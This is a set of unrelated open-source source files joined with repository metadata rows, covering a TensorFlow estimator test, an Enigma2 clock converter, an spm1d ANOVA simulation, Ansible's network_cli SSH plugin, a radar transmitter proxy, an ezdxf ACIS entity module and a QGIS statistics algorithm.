num_trees=1,
tree_examples_per_layer=3,
model_dir=model_dir,
config=config,
dnn_steps_to_train=10,
dnn_input_layer_to_tree=False,
tree_feature_columns=[core_feature_column.numeric_column("x")])
# Train for a few steps.
est.train(input_fn=_train_input_fn, steps=1000)
# 10 steps for dnn, 3 for 1 tree of depth 3 + 1 after the tree finished
self._assert_checkpoint(est.model_dir, global_step=14)
res = est.evaluate(input_fn=_eval_input_fn, steps=1)
self.assertLess(0.5, res["auc"])
est.predict(input_fn=_eval_input_fn)
def testTrainEvaluateInferDoesNotThrowErrorWithDnnInput(self):
head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
loss_reduction=losses.Reduction.SUM_OVER_NONZERO_WEIGHTS)
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 3
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
est = estimator.CoreDNNBoostedTreeCombinedEstimator(
head=head_fn,
dnn_hidden_units=[1],
dnn_feature_columns=[core_feature_column.numeric_column("x")],
tree_learner_config=learner_config,
num_trees=1,
tree_examples_per_layer=3,
model_dir=model_dir,
config=config,
dnn_steps_to_train=10,
dnn_input_layer_to_tree=True,
tree_feature_columns=[])
# Train for a few steps.
est.train(input_fn=_train_input_fn, steps=1000)
res = est.evaluate(input_fn=_eval_input_fn, steps=1)
self.assertLess(0.5, res["auc"])
est.predict(input_fn=_eval_input_fn)
def testTrainEvaluateWithDnnForInputAndTreeForPredict(self):
head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
loss_reduction=losses.Reduction.SUM_OVER_NONZERO_WEIGHTS)
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 3
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
est = estimator.CoreDNNBoostedTreeCombinedEstimator(
head=head_fn,
dnn_hidden_units=[1],
dnn_feature_columns=[core_feature_column.numeric_column("x")],
tree_learner_config=learner_config,
num_trees=1,
tree_examples_per_layer=3,
model_dir=model_dir,
config=config,
dnn_steps_to_train=10,
dnn_input_layer_to_tree=True,
predict_with_tree_only=True,
dnn_to_tree_distillation_param=(0.5, None),
tree_feature_columns=[])
# Train for a few steps.
est.train(input_fn=_train_input_fn, steps=1000)
res = est.evaluate(input_fn=_eval_input_fn, steps=1)
self.assertLess(0.5, res["auc"])
est.predict(input_fn=_eval_input_fn)
serving_input_fn = (
export.build_parsing_serving_input_receiver_fn(
feature_spec={"x": parsing_ops.FixedLenFeature(
[1], dtype=dtypes.float32)}))
base_exporter = exporter.FinalExporter(
name="Servo",
serving_input_receiver_fn=serving_input_fn,
assets_extra=None)
export_path = os.path.join(model_dir, "export")
base_exporter.export(
est,
export_path=export_path,
checkpoint_path=None,
eval_result={},
is_the_final_export=True)
if __name__ == "__main__":
googletest.main()
| apache-2.0 | -2,859,730,329,530,242,000 | 36.722892 | 101 | 0.692111 | false |
eurosata1/e2 | lib/python/Components/Converter/ClockToText.py | 42 | 3445 | from Converter import Converter
from time import localtime, strftime
from Components.Element import cached
class ClockToText(Converter, object):
DEFAULT = 0
WITH_SECONDS = 1
IN_MINUTES = 2
DATE = 3
FORMAT = 4
AS_LENGTH = 5
TIMESTAMP = 6
FULL = 7
SHORT_DATE = 8
LONG_DATE = 9
VFD = 10
AS_LENGTHHOURS = 11
AS_LENGTHSECONDS = 12
# add: date, date as string, weekday, ...
# (whatever you need!)
def __init__(self, type):
Converter.__init__(self, type)
self.fix = ""
if ';' in type:
type, self.fix = type.split(';')
if type == "WithSeconds":
self.type = self.WITH_SECONDS
elif type == "InMinutes":
self.type = self.IN_MINUTES
elif type == "Date":
self.type = self.DATE
elif type == "AsLength":
self.type = self.AS_LENGTH
elif type == "AsLengthHours":
self.type = self.AS_LENGTHHOURS
elif type == "AsLengthSeconds":
self.type = self.AS_LENGTHSECONDS
elif type == "Timestamp":
self.type = self.TIMESTAMP
elif type == "Full":
self.type = self.FULL
elif type == "ShortDate":
self.type = self.SHORT_DATE
elif type == "LongDate":
self.type = self.LONG_DATE
elif type == "VFD":
self.type = self.VFD
elif "Format" in type:
self.type = self.FORMAT
self.fmt_string = type[7:]
else:
self.type = self.DEFAULT
@cached
def getText(self):
time = self.source.time
if time is None:
return ""
# add/remove 1st space
def fix_space(string):
if "Proportional" in self.fix and t.tm_hour < 10:
return " " + string
if "NoSpace" in self.fix:
return string.lstrip(' ')
return string
# handle durations
if self.type == self.IN_MINUTES:
return _("%d min") % (time / 60)
elif self.type == self.AS_LENGTH:
if time < 0:
return ""
return "%d:%02d" % (time / 60, time % 60)
elif self.type == self.AS_LENGTHHOURS:
if time < 0:
return ""
return "%d:%02d" % (time / 3600, time / 60 % 60)
elif self.type == self.AS_LENGTHSECONDS:
if time < 0:
return ""
return "%d:%02d:%02d" % (time / 3600, time / 60 % 60, time % 60)
elif self.type == self.TIMESTAMP:
return str(time)
t = localtime(time)
if self.type == self.WITH_SECONDS:
# TRANSLATORS: full time representation hour:minute:seconds
return fix_space(_("%2d:%02d:%02d") % (t.tm_hour, t.tm_min, t.tm_sec))
elif self.type == self.DEFAULT:
# TRANSLATORS: short time representation hour:minute
return fix_space(_("%2d:%02d") % (t.tm_hour, t.tm_min))
elif self.type == self.DATE:
# TRANSLATORS: full date representation dayname daynum monthname year in strftime() format! See 'man strftime'
d = _("%A %e %B %Y")
elif self.type == self.FULL:
# TRANSLATORS: long date representation short dayname daynum short monthname hour:minute in strftime() format! See 'man strftime'
d = _("%a %e/%m %-H:%M")
elif self.type == self.SHORT_DATE:
# TRANSLATORS: short date representation short dayname daynum short monthname in strftime() format! See 'man strftime'
d = _("%a %e/%m")
elif self.type == self.LONG_DATE:
# TRANSLATORS: long date representations dayname daynum monthname in strftime() format! See 'man strftime'
d = _("%A %e %B")
elif self.type == self.VFD:
# TRANSLATORS: VFD hour:minute daynum short monthname in strftime() format! See 'man strftime'
d = _("%k:%M %e/%m")
elif self.type == self.FORMAT:
d = self.fmt_string
else:
return "???"
return strftime(d, t)
text = property(getText)
| gpl-2.0 | 5,178,587,818,289,730,000 | 27.94958 | 132 | 0.6418 | false |
0todd0000/spm1d | spm1d/rft1d/examples/val_max_4_anova1_1d.py | 1 | 2121 |
import numpy as np
from matplotlib import pyplot
from spm1d import rft1d
eps = np.finfo(float).eps
def here_anova1(Y, X, X0, Xi, X0i, df):
Y = np.matrix(Y)
### estimate parameters:
b = Xi*Y
eij = Y - X*b
R = eij.T*eij
### reduced design:
b0 = X0i*Y
eij0 = Y - X0*b0
R0 = eij0.T*eij0
### compute F statistic:
F = ((np.diag(R0)-np.diag(R))/df[0]) / (np.diag(R+eps)/df[1])
return F
def here_design_matrices(nResponses, nGroups):
nTotal = sum(nResponses)
X = np.zeros((nTotal,nGroups))
i0 = 0
for i,n in enumerate(nResponses):
X[i0:i0+n,i] = 1
i0 += n
X = np.matrix(X)
X0 = np.matrix(np.ones(nTotal)).T #reduced design matrix
Xi,X0i = np.linalg.pinv(X), np.linalg.pinv(X0) #pseudo-inverses
return X,X0,Xi,X0i
#(0) Set parameters:
np.random.seed(123456789)
nResponses = 6,8,9 #number of responses in each group
nNodes = 101
FWHM = 12.0
nIterations = 5000
### derived parameters:
nGroups = len(nResponses)
nTotal = sum(nResponses)
df = nGroups-1, nTotal-nGroups
X,X0,Xi,X0i = here_design_matrices(nResponses, nGroups)
#(1) Generate Gaussian 1D fields, compute test stat, store field maximum:
F = []
generator = rft1d.random.Generator1D(nTotal, nNodes, FWHM)
for i in range(nIterations):
y = generator.generate_sample()
f = here_anova1(y, X, X0, Xi, X0i, df)
F.append( f.max() )
F = np.asarray(F)
#(2) Survival functions:
heights = np.linspace(6, 14, 21)
sf = np.array( [ (F>h).mean() for h in heights] )
sfE = rft1d.f.sf(heights, df, nNodes, FWHM) #theoretical
sf0D = rft1d.f.sf0d(heights, df) #theoretical (0D)
#(3) Plot results:
pyplot.close('all')
ax = pyplot.axes()
ax.plot(heights, sf, 'o', label='Simulated')
ax.plot(heights, sfE, '-', label='Theoretical')
ax.plot(heights, sf0D, 'r-', label='Theoretical (0D)')
ax.set_xlabel('$u$', size=20)
ax.set_ylabel('$P (F_\mathrm{max} > u)$', size=20)
ax.legend()
ax.set_title('ANOVA validation (1D)', size=20)
pyplot.show()
| gpl-3.0 | 3,806,504,572,669,593,000 | 25.848101 | 73 | 0.602074 | false |
hogarthj/ansible | lib/ansible/plugins/connection/network_cli.py | 5 | 19736 | # (c) 2016 Red Hat Inc.
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
---
author: Ansible Networking Team
connection: network_cli
short_description: Use network_cli to run command on network appliances
description:
- This connection plugin provides a connection to remote devices over the
SSH and implements a CLI shell. This connection plugin is typically used by
network devices for sending and receiving CLi commands to network devices.
version_added: "2.3"
options:
host:
description:
- Specifies the remote device FQDN or IP address to establish the SSH
connection to.
default: inventory_hostname
vars:
- name: ansible_host
port:
type: int
description:
- Specifies the port on the remote device to listening for connections
when establishing the SSH connection.
default: 22
ini:
- section: defaults
key: remote_port
env:
- name: ANSIBLE_REMOTE_PORT
vars:
- name: ansible_port
network_os:
description:
- Configures the device platform network operating system. This value is
used to load the correct terminal and cliconf plugins to communicate
with the remote device
vars:
- name: ansible_network_os
remote_user:
description:
- The username used to authenticate to the remote device when the SSH
connection is first established. If the remote_user is not specified,
the connection will use the username of the logged in user.
- Can be configured form the CLI via the C(--user) or C(-u) options
ini:
- section: defaults
key: remote_user
env:
- name: ANSIBLE_REMOTE_USER
vars:
- name: ansible_user
password:
description:
- Configures the user password used to authenticate to the remote device
when first establishing the SSH connection.
vars:
- name: ansible_password
- name: ansible_ssh_pass
private_key_file:
description:
- The private SSH key or certificate file used to to authenticate to the
remote device when first establishing the SSH connection.
ini:
section: defaults
key: private_key_file
env:
- name: ANSIBLE_PRIVATE_KEY_FILE
vars:
- name: ansible_private_key_file
timeout:
type: int
description:
- Sets the connection time, in seconds, for the communicating with the
remote device. This timeout is used as the default timeout value for
commands when issuing a command to the network CLI. If the command
does not return in timeout seconds, the an error is generated.
default: 120
become:
type: boolean
description:
- The become option will instruct the CLI session to attempt privilege
escalation on platforms that support it. Normally this means
transitioning from user mode to C(enable) mode in the CLI session.
If become is set to True and the remote device does not support
privilege escalation or the privilege has already been elevated, then
this option is silently ignored
- Can be configured form the CLI via the C(--become) or C(-b) options
default: False
ini:
section: privilege_escalation
key: become
env:
- name: ANSIBLE_BECOME
vars:
- name: ansible_become
become_method:
description:
- This option allows the become method to be specified in for handling
privilege escalation. Typically the become_method value is set to
C(enable) but could be defined as other values.
default: sudo
ini:
section: privilege_escalation
key: become_method
env:
- name: ANSIBLE_BECOME_METHOD
vars:
- name: ansible_become_method
host_key_auto_add:
type: boolean
description:
- By default, Ansible will prompt the user before adding SSH keys to the
known hosts file. Since persistent connections such as network_cli run
in background processes, the user will never be prompted. By enabling
this option, unknown host keys will automatically be added to the
known hosts file.
- Be sure to fully understand the security implications of enabling this
option on production systems as it could create a security vulnerability.
default: False
ini:
section: paramiko_connection
key: host_key_auto_add
env:
- name: ANSIBLE_HOST_KEY_AUTO_ADD
persistent_connect_timeout:
type: int
description:
- Configures, in seconds, the amount of time to wait when trying to
initially establish a persistent connection. If this value expires
before the connection to the remote device is completed, the connection
will fail
default: 30
ini:
section: persistent_connection
key: persistent_connect_timeout
env:
- name: ANSIBLE_PERSISTENT_CONNECT_TIMEOUT
persistent_command_timeout:
type: int
description:
- Configures, in seconds, the amount of time to wait for a command to
return from the remote device. If this timer is exceeded before the
command returns, the connection plugin will raise an exception and
close
default: 10
ini:
section: persistent_connection
key: persistent_command_timeout
env:
- name: ANSIBLE_PERSISTENT_COMMAND_TIMEOUT
"""
import json
import logging
import re
import os
import socket
import traceback
from ansible import constants as C
from ansible.errors import AnsibleConnectionFailure
from ansible.module_utils.six import BytesIO, PY3
from ansible.module_utils.six.moves import cPickle
from ansible.module_utils._text import to_bytes, to_text
from ansible.playbook.play_context import PlayContext
from ansible.plugins.loader import cliconf_loader, terminal_loader, connection_loader
from ansible.plugins.connection import ConnectionBase
from ansible.utils.path import unfrackpath
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class Connection(ConnectionBase):
''' CLI (shell) SSH connections on Paramiko '''
transport = 'network_cli'
has_pipelining = True
force_persistence = True
def __init__(self, play_context, new_stdin, *args, **kwargs):
super(Connection, self).__init__(play_context, new_stdin, *args, **kwargs)
self._ssh_shell = None
self._matched_prompt = None
self._matched_pattern = None
self._last_response = None
self._history = list()
self._play_context = play_context
self._local = connection_loader.get('local', play_context, '/dev/null')
self._local.set_options()
self._terminal = None
self._cliconf = None
self._ansible_playbook_pid = kwargs.get('ansible_playbook_pid')
if self._play_context.verbosity > 3:
logging.getLogger('paramiko').setLevel(logging.DEBUG)
# reconstruct the socket_path and set instance values accordingly
self._update_connection_state()
def __getattr__(self, name):
try:
return self.__dict__[name]
except KeyError:
if name.startswith('_'):
raise AttributeError("'%s' object has no attribute '%s'" % (self.__class__.__name__, name))
return getattr(self._cliconf, name)
def get_prompt(self):
"""Returns the current prompt from the device"""
return self._matched_prompt
def exec_command(self, cmd, in_data=None, sudoable=True):
# this try..except block is just to handle the transition to supporting
# network_cli as a toplevel connection. Once connection=local is gone,
# this block can be removed as well and all calls passed directly to
# the local connection
if self._ssh_shell:
try:
cmd = json.loads(to_text(cmd, errors='surrogate_or_strict'))
kwargs = {'command': to_bytes(cmd['command'], errors='surrogate_or_strict')}
for key in ('prompt', 'answer', 'sendonly', 'newline', 'prompt_retry_check'):
if cmd.get(key) is True or cmd.get(key) is False:
kwargs[key] = cmd[key]
elif cmd.get(key) is not None:
kwargs[key] = to_bytes(cmd[key], errors='surrogate_or_strict')
return self.send(**kwargs)
except ValueError:
cmd = to_bytes(cmd, errors='surrogate_or_strict')
return self.send(command=cmd)
else:
return self._local.exec_command(cmd, in_data, sudoable)
def put_file(self, in_path, out_path):
return self._local.put_file(in_path, out_path)
def fetch_file(self, in_path, out_path):
return self._local.fetch_file(in_path, out_path)
def update_play_context(self, pc_data):
"""Updates the play context information for the connection"""
pc_data = to_bytes(pc_data)
if PY3:
pc_data = cPickle.loads(pc_data, encoding='bytes')
else:
pc_data = cPickle.loads(pc_data)
play_context = PlayContext()
play_context.deserialize(pc_data)
messages = ['updating play_context for connection']
if self._play_context.become is False and play_context.become is True:
auth_pass = play_context.become_pass
self._terminal.on_become(passwd=auth_pass)
messages.append('authorizing connection')
elif self._play_context.become is True and not play_context.become:
self._terminal.on_unbecome()
messages.append('deauthorizing connection')
self._play_context = play_context
return messages
def _connect(self):
'''
Connects to the remote device and starts the terminal
'''
if self.connected:
return
self.paramiko_conn = connection_loader.get('paramiko', self._play_context, '/dev/null')
self.paramiko_conn.set_options(direct={'look_for_keys': not bool(self._play_context.password and not self._play_context.private_key_file)})
self.paramiko_conn.force_persistence = self.force_persistence
ssh = self.paramiko_conn._connect()
display.vvvv('ssh connection done, setting terminal', host=self._play_context.remote_addr)
self._ssh_shell = ssh.ssh.invoke_shell()
self._ssh_shell.settimeout(self._play_context.timeout)
network_os = self._play_context.network_os
if not network_os:
raise AnsibleConnectionFailure(
'Unable to automatically determine host network os. Please '
'manually configure ansible_network_os value for this host'
)
self._terminal = terminal_loader.get(network_os, self)
if not self._terminal:
raise AnsibleConnectionFailure('network os %s is not supported' % network_os)
display.vvvv('loaded terminal plugin for network_os %s' % network_os, host=self._play_context.remote_addr)
self._cliconf = cliconf_loader.get(network_os, self)
if self._cliconf:
display.vvvv('loaded cliconf plugin for network_os %s' % network_os, host=self._play_context.remote_addr)
else:
display.vvvv('unable to load cliconf for network_os %s' % network_os)
self.receive()
display.vvvv('firing event: on_open_shell()', host=self._play_context.remote_addr)
self._terminal.on_open_shell()
if self._play_context.become and self._play_context.become_method == 'enable':
display.vvvv('firing event: on_become', host=self._play_context.remote_addr)
auth_pass = self._play_context.become_pass
self._terminal.on_become(passwd=auth_pass)
display.vvvv('ssh connection has completed successfully', host=self._play_context.remote_addr)
self._connected = True
return self
def _update_connection_state(self):
'''
Reconstruct the connection socket_path and check if it exists
If the socket path exists then the connection is active and set
both the _socket_path value to the path and the _connected value
to True. If the socket path doesn't exist, leave the socket path
value to None and the _connected value to False
'''
ssh = connection_loader.get('ssh', class_only=True)
cp = ssh._create_control_path(self._play_context.remote_addr, self._play_context.port, self._play_context.remote_user, self._play_context.connection,
self._ansible_playbook_pid)
tmp_path = unfrackpath(C.PERSISTENT_CONTROL_PATH_DIR)
socket_path = unfrackpath(cp % dict(directory=tmp_path))
if os.path.exists(socket_path):
self._connected = True
self._socket_path = socket_path
def reset(self):
'''
Reset the connection
'''
if self._socket_path:
display.vvvv('resetting persistent connection for socket_path %s' % self._socket_path, host=self._play_context.remote_addr)
self.close()
display.vvvv('reset call on connection instance', host=self._play_context.remote_addr)
def close(self):
'''
Close the active connection to the device
'''
# only close the connection if its connected.
if self._connected:
display.debug("closing ssh connection to device")
if self._ssh_shell:
display.debug("firing event: on_close_shell()")
self._terminal.on_close_shell()
self._ssh_shell.close()
self._ssh_shell = None
display.debug("cli session is now closed")
self.paramiko_conn.close()
self.paramiko_conn = None
display.debug("ssh connection has been closed successfully")
self._connected = False
def receive(self, command=None, prompts=None, answer=None, newline=True, prompt_retry_check=False):
'''
Handles receiving of output from command
'''
recv = BytesIO()
handled = False
self._matched_prompt = None
self._matched_cmd_prompt = None
matched_prompt_window = window_count = 0
while True:
data = self._ssh_shell.recv(256)
# when a channel stream is closed, received data will be empty
if not data:
break
recv.write(data)
offset = recv.tell() - 256 if recv.tell() > 256 else 0
recv.seek(offset)
window = self._strip(recv.read())
window_count += 1
if prompts and not handled:
handled = self._handle_prompt(window, prompts, answer, newline)
matched_prompt_window = window_count
elif prompts and handled and prompt_retry_check and matched_prompt_window + 1 == window_count:
# check again even when handled, if same prompt repeats in next window
# (like in the case of a wrong enable password, etc) indicates
# value of answer is wrong, report this as error.
if self._handle_prompt(window, prompts, answer, newline, prompt_retry_check):
raise AnsibleConnectionFailure("For matched prompt '%s', answer is not valid" % self._matched_cmd_prompt)
if self._find_prompt(window):
self._last_response = recv.getvalue()
resp = self._strip(self._last_response)
return self._sanitize(resp, command)
def send(self, command, prompt=None, answer=None, newline=True, sendonly=False, prompt_retry_check=False):
'''
Sends the command to the device in the opened shell
'''
try:
self._history.append(command)
self._ssh_shell.sendall(b'%s\r' % command)
if sendonly:
return
response = self.receive(command, prompt, answer, newline, prompt_retry_check)
return to_text(response, errors='surrogate_or_strict')
except (socket.timeout, AttributeError):
display.vvvv(traceback.format_exc(), host=self._play_context.remote_addr)
raise AnsibleConnectionFailure("timeout trying to send command: %s" % command.strip())
def _strip(self, data):
'''
Removes ANSI codes from device response
'''
for regex in self._terminal.ansi_re:
data = regex.sub(b'', data)
return data
def _handle_prompt(self, resp, prompts, answer, newline, prompt_retry_check=False):
'''
Matches the command prompt and responds
:arg resp: Byte string containing the raw response from the remote
:arg prompts: Sequence of byte strings that we consider prompts for input
:arg answer: Byte string to send back to the remote if we find a prompt.
A carriage return is automatically appended to this string.
:returns: True if a prompt was found in ``resp``. False otherwise
'''
if not isinstance(prompts, list):
prompts = [prompts]
prompts = [re.compile(r, re.I) for r in prompts]
for regex in prompts:
match = regex.search(resp)
if match:
# if prompt_retry_check is enabled to check if same prompt is
# repeated don't send answer again.
if not prompt_retry_check:
self._ssh_shell.sendall(b'%s' % answer)
if newline:
self._ssh_shell.sendall(b'\r')
self._matched_cmd_prompt = match.group()
return True
return False
def _sanitize(self, resp, command=None):
'''
Removes elements from the response before returning to the caller
'''
cleaned = []
for line in resp.splitlines():
if (command and line.strip() == command.strip()) or self._matched_prompt.strip() in line:
continue
cleaned.append(line)
return b'\n'.join(cleaned).strip()
def _find_prompt(self, response):
'''Searches the buffered response for a matching command prompt
'''
errored_response = None
is_error_message = False
for regex in self._terminal.terminal_stderr_re:
if regex.search(response):
is_error_message = True
# Check if error response ends with command prompt if not
# receive it buffered prompt
for regex in self._terminal.terminal_stdout_re:
match = regex.search(response)
if match:
errored_response = response
self._matched_pattern = regex.pattern
self._matched_prompt = match.group()
break
if not is_error_message:
for regex in self._terminal.terminal_stdout_re:
match = regex.search(response)
if match:
self._matched_pattern = regex.pattern
self._matched_prompt = match.group()
if not errored_response:
return True
if errored_response:
raise AnsibleConnectionFailure(errored_response)
return False
| gpl-3.0 | -1,402,785,099,885,922,800 | 37.774067 | 157 | 0.624443 | false |
weightedEights/runDBcheck | RADAR_DATA/20170713.001/Source/Shell/proxies/txcProxy.py | 5 | 2285 | """
Txc proxy.
This proxy handles all communication between the Txc and the
shell programs
"""
from shell.proxies.baseProxy import baseProxy
import os,re
import time
from xmlrpclib import ServerProxy
import siteconfig
class txcProxy(baseProxy):
def __init__(self,experiment):
baseProxy.__init__(self,'txc',experiment)
txcurl = siteconfig.url('txc')
self.remote = ServerProxy(txcurl)
h5buffer = self.exp.h5Buffer
try:
h5buffer.setDynamic('/Tx/Power',[0.0,0.0])
h5buffer.setAttribute('/Tx/Power/Unit','W')
h5buffer.setAttribute('/Tx/Power/Description','Transmitted power')
except Exception,inst:
self.log.exception(inst)
self.log.info('Initialized')
def setup(self,n):
baseProxy.setup(self,n)
section = '%s mode:%d' % (self.exp.dtc,n)
txf = self.exp.experimentConfig.get(section,'txfrequency',0)
try:
# sondrestrom legacy
f = int(txf)
self.powerName = 'txcfrequency%dpower' % (f)
except:
# amisr and new sondrestrom way. The freq is named directly in the exp file
mo = re.match('tx([c0-9]*)frequency([0-9]*)',txf,re.I)
txid = mo.group(1)
txlo = mo.group(2)
self.powerName = 'tx%sfrequency%spower' % (txid,txlo)
def storeData(self,h5buffer,starttime,endtime,vars):
tsub = time.clock()
state = self.remote.getState([starttime,endtime])
esub = time.clock()-tsub
self.log.info('Gathering txc info: %3.2f [secs]' % (esub))
# set boi info
if state[0]['_timediff'] < 60:
h5buffer.h5Dynamic.setOutBoi('/Tx/Power',state[0][self.powerName])
else:
self.log.error('Txc boi info of in time by: %f secs' % (state[0]['_timediff']))
# set eoi info
if state[1]['_timediff'] < 60:
h5buffer.h5Dynamic.setOutEoi('/Tx/Power',state[1][self.powerName])
else:
self.log.error('Txc eoi info of in time by: %f secs' % (state[1]['_timediff']))
proxy = txcProxy | gpl-3.0 | -3,221,776,232,844,869,000 | 31.197183 | 91 | 0.550547 | false |
jorgealmerio/QEsg | core/ezdxf/modern/solid3d.py | 1 | 2503 | # Purpose: support for ACIS based 3D entities - BODY, REGION, 3DSOLID
# Created: 24.05.2015
# Copyright (C) 2015, Manfred Moitzi
# License: MIT License
from __future__ import unicode_literals
__author__ = "mozman <[email protected]>"
from contextlib import contextmanager
from .graphics import none_subclass, entity_subclass, ModernGraphicEntity
from ..lldxf.types import convert_tags_to_text_lines, convert_text_lines_to_tags
from ..lldxf.classifiedtags import ClassifiedTags
from ..lldxf.attributes import DXFAttr, DXFAttributes, DefSubclass
from ..tools import crypt
_BODY_TPL = """ 0
BODY
5
0
330
0
100
AcDbEntity
8
0
100
AcDbModelerGeometry
70
1
"""
modeler_geometry_subclass = DefSubclass('AcDbModelerGeometry', {
'version': DXFAttr(70, default=1),
})
class Body(ModernGraphicEntity):
TEMPLATE = ClassifiedTags.from_text(_BODY_TPL)
DXFATTRIBS = DXFAttributes(none_subclass, entity_subclass, modeler_geometry_subclass)
def get_acis_data(self):
modeler_geometry = self.tags.subclasses[2]
text_lines = convert_tags_to_text_lines(tag for tag in modeler_geometry if tag.code in (1, 3))
return crypt.decode(text_lines)
def set_acis_data(self, text_lines):
def cleanup(lines):
for line in lines:
yield line.rstrip().replace('\n', '')
modeler_geometry = self.tags.subclasses[2]
# remove existing text
modeler_geometry[:] = (tag for tag in modeler_geometry if tag.code not in (1, 3))
modeler_geometry.extend(convert_text_lines_to_tags(crypt.encode(cleanup(text_lines))))
@contextmanager
def edit_data(self):
data = ModelerGeometryData(self)
yield data
self.set_acis_data(data.text_lines)
class ModelerGeometryData(object):
def __init__(self, body):
self.text_lines = list(body.get_acis_data())
def __str__(self):
return "\n".join(self.text_lines)
def set_text(self, text, sep='\n'):
self.text_lines = text.split(sep)
class Region(Body):
TEMPLATE = ClassifiedTags.from_text(_BODY_TPL.replace('BODY', 'REGION'))
_3DSOLID_TPL = """ 0
3DSOLID
5
0
330
0
100
AcDbEntity
8
0
100
AcDbModelerGeometry
70
1
100
AcDb3dSolid
350
0
"""
class Solid3d(Body):
TEMPLATE = ClassifiedTags.from_text(_3DSOLID_TPL)
DXFATTRIBS = DXFAttributes(
none_subclass,
entity_subclass,
modeler_geometry_subclass,
DefSubclass('AcDb3dSolid', {'history': DXFAttr(350, default=0)})
)
| gpl-3.0 | -2,290,913,446,886,631,700 | 22.175926 | 102 | 0.679584 | false |
tudorbarascu/QGIS | python/plugins/processing/algs/qgis/BasicStatistics.py | 30 | 13335 | # -*- coding: utf-8 -*-
"""
***************************************************************************
BasicStatistics.py
---------------------
Date : November 2016
Copyright : (C) 2016 by Nyall Dawson
Email : nyall dot dawson at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Nyall Dawson'
__date__ = 'November 2016'
__copyright__ = '(C) 2016, Nyall Dawson'
import os
import codecs
from qgis.PyQt.QtCore import QVariant
from qgis.PyQt.QtGui import QIcon
from qgis.core import (QgsApplication,
QgsStatisticalSummary,
QgsStringStatisticalSummary,
QgsDateTimeStatisticalSummary,
QgsFeatureRequest,
QgsProcessing,
QgsProcessingException,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterField,
QgsProcessingParameterFileDestination,
QgsProcessingOutputNumber,
QgsProcessingFeatureSource)
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class BasicStatisticsForField(QgisAlgorithm):
INPUT_LAYER = 'INPUT_LAYER'
FIELD_NAME = 'FIELD_NAME'
OUTPUT_HTML_FILE = 'OUTPUT_HTML_FILE'
MIN = 'MIN'
MAX = 'MAX'
COUNT = 'COUNT'
UNIQUE = 'UNIQUE'
EMPTY = 'EMPTY'
FILLED = 'FILLED'
MIN_LENGTH = 'MIN_LENGTH'
MAX_LENGTH = 'MAX_LENGTH'
MEAN_LENGTH = 'MEAN_LENGTH'
CV = 'CV'
SUM = 'SUM'
MEAN = 'MEAN'
STD_DEV = 'STD_DEV'
RANGE = 'RANGE'
MEDIAN = 'MEDIAN'
MINORITY = 'MINORITY'
MAJORITY = 'MAJORITY'
FIRSTQUARTILE = 'FIRSTQUARTILE'
THIRDQUARTILE = 'THIRDQUARTILE'
IQR = 'IQR'
def icon(self):
return QgsApplication.getThemeIcon("/algorithms/mAlgorithmBasicStatistics.svg")
def svgIconPath(self):
return QgsApplication.iconPath("/algorithms/mAlgorithmBasicStatistics.svg")
def tags(self):
return self.tr(
'stats,statistics,date,time,datetime,string,number,text,table,layer,sum,maximum,minimum,mean,average,standard,deviation,'
'count,distinct,unique,variance,median,quartile,range,majority,minority,summary').split(',')
def group(self):
return self.tr('Vector analysis')
def groupId(self):
return 'vectoranalysis'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.addParameter(QgsProcessingParameterFeatureSource(self.INPUT_LAYER,
self.tr('Input layer'),
types=[QgsProcessing.TypeVector]))
self.addParameter(QgsProcessingParameterField(self.FIELD_NAME,
self.tr('Field to calculate statistics on'),
None, self.INPUT_LAYER, QgsProcessingParameterField.Any))
self.addParameter(QgsProcessingParameterFileDestination(self.OUTPUT_HTML_FILE, self.tr('Statistics'),
self.tr('HTML files (*.html)'), None, True))
self.addOutput(QgsProcessingOutputNumber(self.COUNT, self.tr('Count')))
self.addOutput(QgsProcessingOutputNumber(self.UNIQUE, self.tr('Number of unique values')))
self.addOutput(QgsProcessingOutputNumber(self.EMPTY, self.tr('Number of empty (null) values')))
self.addOutput(QgsProcessingOutputNumber(self.FILLED, self.tr('Number of non-empty values')))
self.addOutput(QgsProcessingOutputNumber(self.MIN, self.tr('Minimum value')))
self.addOutput(QgsProcessingOutputNumber(self.MAX, self.tr('Maximum value')))
self.addOutput(QgsProcessingOutputNumber(self.MIN_LENGTH, self.tr('Minimum length')))
self.addOutput(QgsProcessingOutputNumber(self.MAX_LENGTH, self.tr('Maximum length')))
self.addOutput(QgsProcessingOutputNumber(self.MEAN_LENGTH, self.tr('Mean length')))
self.addOutput(QgsProcessingOutputNumber(self.CV, self.tr('Coefficient of Variation')))
self.addOutput(QgsProcessingOutputNumber(self.SUM, self.tr('Sum')))
self.addOutput(QgsProcessingOutputNumber(self.MEAN, self.tr('Mean value')))
self.addOutput(QgsProcessingOutputNumber(self.STD_DEV, self.tr('Standard deviation')))
self.addOutput(QgsProcessingOutputNumber(self.RANGE, self.tr('Range')))
self.addOutput(QgsProcessingOutputNumber(self.MEDIAN, self.tr('Median')))
self.addOutput(QgsProcessingOutputNumber(self.MINORITY, self.tr('Minority (rarest occurring value)')))
self.addOutput(QgsProcessingOutputNumber(self.MAJORITY, self.tr('Majority (most frequently occurring value)')))
self.addOutput(QgsProcessingOutputNumber(self.FIRSTQUARTILE, self.tr('First quartile')))
self.addOutput(QgsProcessingOutputNumber(self.THIRDQUARTILE, self.tr('Third quartile')))
self.addOutput(QgsProcessingOutputNumber(self.IQR, self.tr('Interquartile Range (IQR)')))
def name(self):
return 'basicstatisticsforfields'
